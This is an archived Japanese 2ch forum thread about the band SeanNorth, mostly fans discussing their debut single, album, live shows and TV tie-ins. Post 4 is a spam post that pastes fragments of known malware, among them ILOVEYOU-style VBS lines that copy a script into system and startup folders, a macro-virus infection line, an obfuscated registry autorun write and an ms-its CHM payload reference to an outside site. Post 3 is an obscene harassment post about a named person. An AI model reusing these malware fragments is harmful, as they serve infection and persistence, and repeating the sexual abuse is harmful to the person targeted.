1read 100read
2013年07月邦楽グループ274: SeanNorth (333) TOP カテ一覧 スレ一覧 2ch元 削除依頼
【百恵友和】PeakySALTパート3【長男】 (465)
The Birthday part93 (703)
【まつろわぬ】ソウルフラワーPart17【放浪者】 (506)
bloodthirsty butchers Part7 (570)
邦楽(グループ)(仮)@2ch掲示板 (686)
★ エイジア エンジニア ★新スレ (104)

SeanNorth


1 :2006/08/31 〜 最終レス :2013/06/27
Debut Maxi Single
「final your song」
テレビ東京系ドラマ24「怨み屋本舗」エンディング・テーマ!
史上初! 1stアルバム全13曲ダイジェスト収録!
PYCM-2003 / ¥1,000(Tax In)
2006.8.23 In Stores !
1. final your song
2. キャロラン
3. 線香花火
4. 1stアルバム全13曲ダイジェスト
公式HP
http://www.muture.co.jp/artists/sean/index.html

2 :

バーカ


3 :
ボーズ ◆batiSANVvk [晒しage]
TERUはただの馬鹿なんかじゃねぇ
何年経ってもカス音楽しか歌えない三十路ヤリマンニートだ
なのになんちゃってミュージシャン語ってるんだ
低脳だからな
TERUはドMだからな
いじめられるとビラビラ開いてマン汁たらして大喜びするからな
みんなドM三十路ヤリマンニートヘタレのTERUを
いじめてやってくれ
( ・ ∀ ・ )ニヤニヤ

4 :
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

5 :
PV:
http://www.barks.jp/watch/?id=1000015640
最近FMでよく聞きますね。
曲紹介の時に毎回アーティスト名が聞き取れなかったのですが、
今日ようやく判明しました。
「Sean」で「シャーン」と読ませるのは無理があるような…
第二のジャングルスマイルってイメージ。


6 :
あげとく

7 :
ごめん、失敗

8 :
すっごく素敵な曲だなぁ
俺は好き

9 :
怨みや本舗のエンディングが聞きたくて聞いてみたけど、
カップリングのキャロランって曲が(・∀・)イイ!

10 :
エルレ以来久々にバンド名に魅かれた

11 :
【生き抜かなきゃ】SeanNorth  part.1【息抜かなきゃ】

12 :
>>11
次スレはそんな感じで始めようと思う
最初は【世界中に】SeanNorth part1【響き渡れ】を候補に入れてた。

13 :
次スレまでちゃんと完走してくれよ

14 :
CD買うまでずっとキャロラインだと思ってた

15 :
前からfinal your songが気になってて歌詞ググってやっとここにたどり着いた。
いい歌だよね

16 :
まったりと行きたいもんですね。

17 :
そうですね。まったりと。シャーンノース自体も大きな事をしそうではないですから、アルバム発売まではシングルの話でもメンバーの話でもなんでも。

18 :
一度解散したらしいね。
経緯はよく分からんけど。

19 :
マターリ

20 :
多分高校卒業が重なってそれぞれの道を行くため
解散したって事なんじゃない?
路上ライブしたら見に行きたいな。

21 :
ローソンでバイトしている学生だが
結構店内で流れている
良い曲だね

22 :
怨み屋本舗見てエンディングいいなと思ってここに辿りつきました。
自分的には久しぶりのヒットなんだけど、あまり知られてないっぽいですね。

23 :
>>12
【歌え鳥よ】SeanNorth part1【響け空へ】がいいなあ

24 :
俺も怨み屋で知ったものだけど
この人たちのアルバムはいつ出るの?

25 :
>>23
パート2くらいからそれにしましょうか。
アルバムでたら変わるような気がしてならない(笑)
>>24
10月11日です。
・・・よく考えたらもうすぐだ。

26 :
ヨドバシ行ったら売り切れだったから注文して来た。
入荷数が少ねーのかな。

27 :
マターリ

28 :
いつ落ちるか分かんねーなw
保守

29 :
書く事がなかなかないんだ(笑)
とりあえずアルバムを待とう。

30 :
シャーンノースってどんなバンドなの?

31 :
久々のストライクw
CDショップで 店員おすすめ!とか書いてあったから
ダメ元で買って聞いてみたら・・・
アルバム曲も好みの曲多いし。
これは素晴らしいやつらですね。

32 :
うん。

33 :
凄いね。
最後に盛り上がるとこ、あれAメロだったんだ。
アレンジと歌い方のおかげで中々気付かなかったw
てか>>5は、シャーンノスを知らないのかな?
この人たちの名前もそれから由来されてると思うんだが。

34 :
そうかもしれんけど、
知らない人がいたっていいじゃない。
アンカーまで付けて指摘せんでも。

35 :
保守

36 :
危なく落ちそうだね、保守しとく。
>>30
http://muture.co.jp/artists/sean/profile.html
こんなバンドです。

37 :
>>36
ありがと。
結構凄い経歴持ってんだね。

38 :
ネタ投下
夢見るジョニー
言葉ひとつ
カーテンコール
七つの海
と先行して聞いたが、どれも凄いぞ!邦楽もここまできたかって感じ。
夢見るジョニーなんか涙ものだったぞ!
>>33
言葉ひとつ以外はみなそんな感じだった。
そうくるかって展開が多々あり。

39 :
個人的に、あてのない世界、終わらない唄の〜
が気になるな
>>33
本当だ
言われなきゃ気付かんかった
確かにさ、よく聞いてみると結構凝ってるね
ボーカルもギターも編曲も。

40 :
ほっしゅ

41 :
過疎りすぎw

42 :
アルバム買うよ。

43 :
明後日か

44 :
地方だから置いてないかもしれん・・・
こうなったら探して回るしかないな

45 :
やべ、明日発売か。
注文しとこ

46 :
フラゲすりゃいーじゃん。

47 :
今、買って来た。
ダイジェストでも思ったけど、やっぱり言葉一つが一番好きだな。
アルバムなのにそれぞれの曲にちゃんと個性があって、凄いと思った。
てかダイジェストと曲順が大分違うね。

48 :
買ってきたけど、1枚しかおいてなかった(´・ω・`)
すげーいいと思うんだけど。
いまひとつブレイクしないのはなぜ・・・

49 :
>>48
同じくすげーいいと思う。
ブレイクしないのはミューチャーの力不足?
こちらも1枚しか置いてなかったよ orz
そのうちブレイクすることを切に願う。

50 :
今はブレイクして欲しいけど
売れたら売れたで、寂しくなるんだよなー
個人的に9→10の流れが好きだ。

51 :
これだけレベルの高いバンドもなかなか無いね。
俺の一番好きなバンドになった

52 :
確かに。
佐々木とLumiって結婚とかしてたりしすんの?
言葉一つ と 終わらない唄の〜 の歌詞は明らかにそんな感じだったから。

53 :
ないないwww

54 :
この人たちのファイナルユアソングのおかげで
楽器と歌声がハモれることを知りました

55 :
だれか渋谷のイベント行ったヤシいないの?

56 :
Gyao見て飛んできました
final your song聞いて心が洗われた…

57 :
この人たちのCDってどれくらい売れてんの?

58 :
>>57
スレを読む限り3枚は確実。

59 :
>>57
IDすごいねwww

60 :
初めて聴いたけど、なかなかいいね。
池田綾子や、初期のガーネットクロウに似てる。好み。
雰囲気はいいので、詩にもうちょっとオリジナリティがあればな、とは思った。

61 :
俺も最初ガネクロに似てると思った。

62 :
キャロランめっさいいね
アルバムどんな感じなのかな

63 :
>>62
1stアルバムなのに完成度高杉
ただ一人しか作曲してないから、このクオリティ維持出来るかちょっと心配。

64 :
本当に完成度高いな。
知名度さえあれば・・

65 :
>>63
レスthxです
ガネクロ買ったら金が…orz

66 :
マターリ

67 :
やっと買えた・・・
金はやばいが、手に入ったからとりあえず嬉しい。
みるかぎりかなり良さそうだから期待して聞いてみます。

68 :
>>67
オメ

69 :
本当にネタが尽きることだけが不安だ。

70 :
とりあえず一回全部聴いてみた。
なかなかいいな。
cloudy crowd 、Lifetime is Ragtime、言葉ひとつ、終わらない唄のクロニクルが好きだ。


71 :
1曲目の「あてのない世界」が一番いい。
しかし作曲担当の佐々木って人は芸達者な人だな。なんでもできるし。
他の二人はオマケみたいなもんで、佐々木さんはピンでもやってけそう。
昔のザバダックを思い出した。

72 :
いや〜、佐々木さんも確かに凄いが
ボーカルのあの声ありきだと思うなぁ、SeanNorthは。
あの声に惚れたからバンド組んだって。

73 :
ボーカルは歌の表情の付け方が滅茶苦茶、上手い気がする

74 :
うーん。水を差すようだけど、ボーカルがそれほどうまいとは思えないな。
発声が不安定だから、聴いててひやひやする時がある。
特に「夢見るジョニー」の序盤みたいなのを聴くと弱点が露呈してしまう。
声にももうちょっと個性がほしい。やっぱり佐々木氏の曲あってなんぼのバンドだと思う。

75 :
俺も個人的にあのボーカルはスゲェと思う。上手/下手とかじゃなくて、彼女にしか出せない世界感っつーか。佐々木の曲に合う。
佐々木の曲とLumiの歌ありきだ。

76 :
お前らはそんなにムーチョが嫌いなのか

77 :
>>76
ムーチョのギターもテクニカルでなかなかだと思う
プログレっぽい響きも有るしね
結局あの3人がうまく絡まり有ってのSeanNorthなんだと思う
それから試しに The Corrs なんかを聞いてみると久雄氏がLumiの
歌声に惚れた意味がなんとなく判るとおもうよ

78 :
今日代官山のライブ行ってくる。ノシ

79 :
行ってきた。
楽曲の良さもさることながら、三人のパフォーマンスに圧倒された。
今日はアコースティック編成。
アコースティックだと演奏技術の高さがより際立つと思った。
一度ライブ行ってみるといいと思いますよ。
宣伝みたいになってしまったけれど、本当にいいバンドに出会えた

80 :
>>79
お疲れ様です。
ライブ行ってみたいなあ・・・
だいたいどんな曲やりました?

81 :
>>1さん
遅ればせながらスレ立て乙です
曲はアルバム中心で、未発表曲が2曲ありました。ちなみに今日はアコギ編成でした。
キャロラン、final〜、グリーンスリーブス(未発表)、言葉ひとつ、
あてのない世界、線光花火、終わらない唄のクロニクル、
ノーチラス(未発表)、七つめの海で全部だったかな?
グリーンスリーブスは『夢見るジョニー』のようにトラディショナルをカバー。ノーチラスは明るいポップなナンバーでした。
グリーンスリーブスのライブ演奏は一見の価値ありだと思いますよ。

82 :
>>81
乙です。
個人的にはグリーン〜が気になるなあ・・・
まあ全部聞いてみたいわけだけど(笑)

83 :
デビューアルバムでこれかよ。
でも現時点でクオリティこんなに高いと、成長することなさそうだなー

84 :
まぁデビューまでが長かったしね

85 :
落とすか

86 :
だいぶ前から知ってたんだが、アルバム一週目は99位だったんだな。
これは・・・いい方なのか?
final〜は82位だったんだが・・・。

87 :
>>86
何枚だったかわかる?

88 :
>>87
それがわからないんだ・・・

89 :
そんなに売れてないのか。
何がいけないんだろーか。やっぱタイアップか?
シングルはタイアップ微妙だったし。
ミヒマルはブレイク中だったからあれだが。

90 :
ながーく続いてくれればおk

91 :
でもこの順位だと・・・

92 :
なんかまたタイアップ決まったらしいな

93 :
kwsk

94 :
>>93
あてのない世界がNHK・TBSドーハアジア大会2006
放送テーマソングに決定

95 :
情報ありがとう
新曲じゃないのか・・・

96 :
今更だが知らんかった・・・
ありがとう。
しかしなかなかいいタイアップが着いたとは思うけど、改めてアルバムが売れることはなさそう・・・

97 :
千年樹とかキャロランをタイアップしてくれたら面白い気がするよ

98 :
いいタイアップだと思うけど
タイアップにするなら、もっとサビにインパクトある曲にした方がいい気がする。
個人的には好きなんだけど、あての〜。

99 :
コンビニで流れてて誰だこれ!と思って
歌詞覚えて検索してやっと見つけた
Voが伸びやかでいいね

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
CHAGE and ASKA Vol.514 (1001)
フジファブリック95 (311)
【小渕・168cm】コブクロ Part173【黒田・193cm】 (883)
andymori 18 (698)
bloodthirsty butchers Part7 (570)
fripSide part23 (448)
--log9.info------------------
ファイアーエムブレムWiiUを出すには世界70万の売上か必要と判明!! (383)
児童ポルノ法改正でケモノゲー・ドラゴンゲーの時代くるー? (135)
【ゲームハード】次世代機テクノロジー122【スレ】 (183)
【PS3】PlayStation3 総合スレ Part3208 (152)
【悲報】PS4、GDDR5のレイテンシの影響で実効性能には疑問★2 (529)
ソニー、1500億円規模の社債発行 個人向け起債は初★2 (158)
⊂Nintendo⊃任天堂総合スレ その3238 (622)
「英雄伝説 閃の軌跡」体験会「グラフィックスが本当に綺麗」 (491)
【CS機から】NVIDIAってゲーム業界の大ガンだよな【全ハブ】 (152)
ニンテンドー3DS その1154 (269)
XBOX ONEスペック変更でPS4終了のお知らせ (256)
クラブニンテンドー、他社流出のIDパスワードで2万4千件不正ログイン (1001)
ラブライブ!ゲーム化決定でVITAの期待感ほのかに高まる (235)
【3DS】ニューラブプラス+発売決定!! (674)
■■速報@ゲーハー板 ver.25528■■ (1001)
PS4はなんとXbox ONEより1.5倍性能が高いらしい part2 (364)
--log55.com------------------
【衝撃】キウイ、皮ごと食べるのが正解だった [778992118]
広島「原爆落とされた―!!ドーム!平和祈念館!」長崎「いや、、こちらも落とされたんだけどなんで扱い小さいん?」なぜ? [608697454]
電車でノースリーブ着てワキ全開なのに「つり革」につかまってるお姉さんww [585351372]
【朗報】佐倉綾音さん、処女確定 [303493227]
クレジットカードを利用しようと思う、おすすめのカード会社を教えてくだされ [604928783]
同窓会行ったら妙に老けてたり若々しい奴の差が凄くてワロタ イケメンだった奴がハゲてたりしてて最高に面白い [267635795]
ヘッドホンに3万円 →本当にそれだけの価値あるの? [324064431]
登山靴って本当に必要なのか スニーカーでいいじゃないのか [331464139]